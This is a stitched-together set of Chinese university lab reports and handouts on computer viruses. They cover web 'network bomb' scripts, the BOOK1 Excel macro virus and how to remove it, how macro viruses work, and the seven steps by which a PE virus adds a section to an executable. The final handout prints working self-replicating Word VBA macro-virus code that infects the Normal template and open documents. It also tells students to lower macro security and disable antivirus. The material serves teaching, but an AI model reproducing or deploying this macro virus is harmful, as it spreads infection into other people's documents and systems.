一、实验目的 (1)掌握常见几种病毒的基本原理 (2)掌握清除病毒的方法 (3)学会使用几种常见病毒进行基本编程的技术 二、实验内容 分别用PE病毒,欢乐时光脚本病毒,梅丽莎宏病毒,台湾宏病毒,万花谷脚本病毒,网络炸弹脚本病毒进行感染和病毒清除实验。 三、实验环境 信息安全综合实验系统 操作系统:WINDOWS2000 JDK版本:Java Standard Edition 1.4.0以上 数据库:Mysql 开发语言:JSP Web服务器:Tomacat Office版本:MS office2000/2003 四、实验结果 1、网络炸弹 (1)实验原理 网页恶意代码确切的讲是一段黑客破坏代码程序,它内嵌在网页中,当用户在不知情的情况下打开含有病毒的网页时,病毒就会发作。这种病毒代码镶嵌技术的原理并不复杂,所以会被很多怀不良企图者利用,使非常多的用户遭受损失。 “网络炸弹”是一种网页恶意代码,可以无限次得弹出固定窗口来达到侵占客户机系统资源,最终导致客户端死机的结果。 (2)结果演示 1、修改IE的安全级别
2、修改注册表的安全设置 图2 修改IE安全设置
3、网络炸弹感染 图3 网络炸弹感染4、网络炸弹源码 图4 网络炸弹源码
2、万花谷脚本病毒 (1)实验原理 JS.On888 脚本病毒(俗称“万花谷”病毒)实际上是一个含有恶意脚本代码的网页文件,其脚本代码具有恶意破坏能力,但并不含有传播性。实验病毒为模仿它所写成的类“万花谷”病毒,减轻了病毒危害。 (2)结果演示 1、修改IE的安全级别 2、万花谷病毒感染 图5 万花谷病毒感染-1
BOOK1宏病毒手工处理方法
BOOK1宏病毒手工处理方法 如果你打开XLS文件,同时会产生一个BOOK1的工作薄,那么,可以确定,你的office2003中了BOOK1宏病毒。该病毒看似无恶意,但是烦人,之后使用过的XLS文件都将被感染。虽然该毒不是新毒,但目前各杀毒软件都不识别。 以下为处理方法: 1、如果你的office2003装在C盘,则双击“防止感染C.bat”,office 装在D盘,则双击“防止感染D.bat”(说明:该操作可在X:\Program Files\Microsoft Office\OFFICE11\XLSTART下生成BOOK1特殊文件(普通方法无法删除),防止该病毒建立book1病毒文件,如果\XLSTART 存在book1(155KB)在启动EXCEL时,就会同时打开该文件,所以感染你打开的XLS文件。) 2、安装“BOOK1宏病毒超专杀.exe”(该软件必须关闭你所装的杀毒软件方可运行。),并对你的XLS文件进行扫描清除宏毒。该软件不理想的是,打开已扫描(已清除)宏病毒的XLS,始终会有禁止宏的提示。按3可以去除。 3、打开已扫描(已清除)宏病毒的XLS,提示点“确定”。点菜单插入,名称,定义,出现“定义名称”对话框,按住ALT+D,用鼠标点列表中的各项(即依次删除各项),最后,保存XLS。再打开就正常了。 通过以上3步,即可彻底搞定该BOOK1病毒。
如果2中,“BOOK1宏病毒超专杀”无法运行,请人工清除该病毒。一定先执行1。然后,打开带宏毒的XLS文件,并启用宏。点菜单格式,工作表,取消隐藏。确定。此时,会出现“00000ppy”工作表,点菜单工具,保护,撤消工作表保护,密码为“VicodinES”。然后,对着“00000ppy”表标签右击,删除。再执行3。到此手工清除结束。
宏病毒深入分析
宏病毒的深入分析 OFFICE给用户提供了用于创建专业而优雅的文档,表格等工具,帮助用户节省时间,并得到优雅美观的结果,在当前使用中是占有巨大优势的文字,数据处理器。它为我们的办公提供了极大的便利.OFFICE为了方便客户,提供了宏这样一个功能。宏就是能组织到一起作为一独立的命令使用的一系列命令,它能使日常工作变得更容易,一般说来,宏是一种规则或模式,或称语法替换,用于说明某一特定输入(通常是字符串)如何根据预定义的规则转换成对应的输出(通常也是字符串)。这种替换在预编译时进行,称作宏展开。通俗的来说,客户事先设置好宏,需要时就可以批量使用,而不必重复操作。然而宏也是一把双刃剑,它在让客户享受便利的同时,同时也为黑客留下了漏洞,这就是今天要分析的宏病毒。 宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。word宏病毒通过.DOC文档及.DOT模板进行自我复制及传播,而计算机文档是交流最广的文件类型。多年来,人们大多重视保护自己 计算机的引导部分和可执行文件不被病毒感染,而对外来的文档文件基本是直接浏览使用,这给Word 宏病毒传播带来很多便利。特别是Intemet网络的普及.Email的大量应用更为Word 宏病毒传播铺平道路。根据国外保守的统计,宏病毒的感染率高达40%以上,即在现实生活中每发现100个病毒,其中就40多个宏病毒,而目前国际上普通病毒种类已达12000多种。 宏病毒的产生,是利用了一些数据处理系统内置宏命令编程语言的特性而形成的。这些数据处理系统内置宏编程语言的存在使得宏病毒有机可乘,病毒可以把特定的宏命令代码附加在指定文件上,通过文件的打开或关闭来获取控制权,实现宏命令在不同文件之间的共享和传递,从而在未经使用者许可的情况下获取控制权,达到传染目的。目前在可被宏病毒感染的文件中,以W0rd,Excel居多。Word宏病毒与Excel宏病毒的特性较为相似,因此以word宏病毒为例,说明宏病毒的作用,传染以及发作的机理和特性。一旦病毒宏侵入woId,它就会替代原有的正常的宏,如FileOpen、FileSave等,并通过这些宏所关联的文件操作功能获取对文件交换的控制。当某项功能被调用时,相应的病毒宏就会篡夺控制权,实施病毒所定义的非法操作,包括传染操作、表现操作以及破坏操作等。宏病毒在感染一个文档时,首先要把文档转换成模板格式,然后把所有病毒宏f 包括自动宏)复制到该文档中。被转换成模板格式后的染毒文件无法转存为任何其他格式。含有自动宏的宏病毒染毒文档,当被其他计算机的woId系统打开时,便会自动感染该计算机。例如,如果病毒捕获并修改了FileOpen.那么,它将感染每一个被打开的Word文件。目前,几乎所有已知的宏病毒都沿用了相同的作用机理,即如果Word 系统在读取一个染毒文件时遭受感染.则其后所有新创建的DOC文件都会被感染。 以往病毒是以二进制的计算机机器码形式出现,而宏病毒则是以人们容易阅读的源代码宏言word Basic形式出现,所以编写和修改宏病毒比以往病毒更容易。目前,世界上的宏病毒原型己有几十种,其变种与日俱增.追究其原因还是Word
计算机病毒实验报告
计算机病毒实验报告 ——windows病毒实验 姓名:张艳秋 学号:081300607 班级:信安0802 指导老师:韦俊银 实验日期:2011.5.27
实验内容 1.PE文件感染实验(选) 2.暴风一号病毒 3.VBS病毒产生 4.宏病毒实验(选)
PE文件感染实验 实验目的 了解pe病毒的感染过程 实验环境 硬件设备 PC机一台(建议虚拟机) 软件工具 Office Word 2007 实验步骤 一:参照病毒感染PE文件的7个步骤,记录病毒是如何感染文件(文字和截屏形式) 病毒感染文件过程(以感染文件ebookcode.exe为例): 重定位,获得所有API地址: …… 通过软件Stud_PE可查看可执行文件ebookcode.exe的结构可查看文件内容: 1.判断目标文件开始的两个字节是否为“MZ”:
2.判断PE文件标记“PE”: 3.判断感染标记,如果已被感染过则跳出继续执行宿主程序,否则继续: 4.读取IMAGE_FILE_HEADER的NumberOfSections域,获得Data Directory (数据目录)的个数,(每个数据目录信息占8个字节): 5.得到节表起始位置。(数据目录的偏移地址+数据目录占用的字节数=节表起始位置):
6.得到节表的末尾偏移(紧接其后用于写入一个新的病毒节信息)节表起始位置+节的个数*(每个节表占用的字节数28H)=节表的末尾偏移 7.开始写入节表,感染文件: 二:在掌握Stud_PE工具的基础上,比较文件感染前后有哪些变化。 感染前:
感染后: 由上两图可以看出,感染前后有4处发生了变化: 1:PE文件头中入口点: 感染病毒后ebookedit.exe程序的入口点变成了病毒文件的入口点 2:PointerToRawData域值,即该文件的偏移量发生了变化; 3:imag的大小发生了变化; 4:sections的数量发生了变化。 由.exe文件感染前后变化可知,PE病毒感染过程即在文件中添加一个新节,
网络安全技术实训项目单--宏病毒制作(自我复制)
计算机网络安全技术实训报告 班级:学号:姓名: 实训:网络安全技术实训项目单-宏病毒制作(自我复制) 一、实训目的 练习使用0FFICE自带宏编辑功能,编写一个能够自我复制的宏病毒程序。 二、实训环境 一台预装 Windows /2003 的主机,。 软件工具: Microsoft Office 2003或2010等版本软件关闭杀毒软;打开Word 2003,在工具 宏 安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问 三、实训内容 实验目的(后果自负) Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。本实验演示了宏的编写,通过两个简单的宏病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。 四、实训要求 实验内容和分析 为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除) 1 自我复制,感染word公用模板和当前文档 2 word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。 代码如下: 'Micro-Virus Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False
Options.SaveNormalPrompt = False Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If With Host If .Lines(1.1) <> "'Micro-Virus" Then .DeleteLines 1, .CountOfLines .InsertLines 1, Ourcode .ReplaceLine 2, "Sub Document_Close()" If ThisDocument = nomaltemplate Then .ReplaceLine 2, "Sub Document_Open()" ActiveDocument.SaveAs ActiveDocument.FullName End If End If End With MsgBox "MicroVirus by Content Security Lab" End Sub 打开一个word文档,然后按Alt+F11调用宏编写窗口(工具宏Visual Basic宏编辑器),在左侧的project—>Microsoft Word对象ThisDocument中输入以上代码,保存,此时当前 五、实训步骤(学生完成) 第一步: 第二步: